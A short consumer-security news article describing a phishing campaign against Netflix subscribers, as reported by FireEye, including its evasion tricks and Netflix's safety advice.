Netflix customers may find themselves in receipt of an unexpectedly high credit card bill if they are not careful – as a new phishing scheme threatens to get hold of their credit card details as well as other personal details.
FireEye, an online security firm tells us that the approach from scammers begins when a Netflix subscriber receives a notification requesting that they make an update to their membership. This notification incorporates a link to a false login page. Once users sign in another page appears requesting members to confirm a number of personal
pieces of information – to include name, date of birth and address. This stage is followed by a request for Social Security number details and payment card information. After this stage has been completed members will be directed on to the actual Netflix homepage. In phishing terms these are typical tactics, but it appears there is more to it than what appears on the surface i.e. the ways in which the campaign remains undetectable. There was a time when all of the phishing pages were available on legal web servers (even though somewhat compromised). These pages do not tend to show, users from some IP addresses, whether they DNS resolved to companies like PhishTank or Google.
There is one more clever way that the phishing campaign steers clear of detection.
This is explained by Mohammed Mohsin Dalla of FireEye in a recent blog post:
Every bit of information stolen from a user is sent to the attackers via the PHP mail utility, which means the bad actors’ can host the phishing pages on multiple websites and receive stolen credentials from a single email account.
All pieces of stolen information from one user are directed to attackers by the PHP mail utility. This results in the bad actors being able to host the phishing pages over numerous website locations and stolen information from a unitary email account.
Netflix, which initiated a reset process for passwords in June 2016, after a period of major breaches, asks users to learn ways to keep themselves safe online by going to https://www.netflix.com/security. This page will act as a reminder for users that Netflix do not ask for personal information via email. Users are also reminded that it is unwise to click on links or email attachments that appear suspicious.
As of the creation of this article the phishing pages in question are no longer accessible.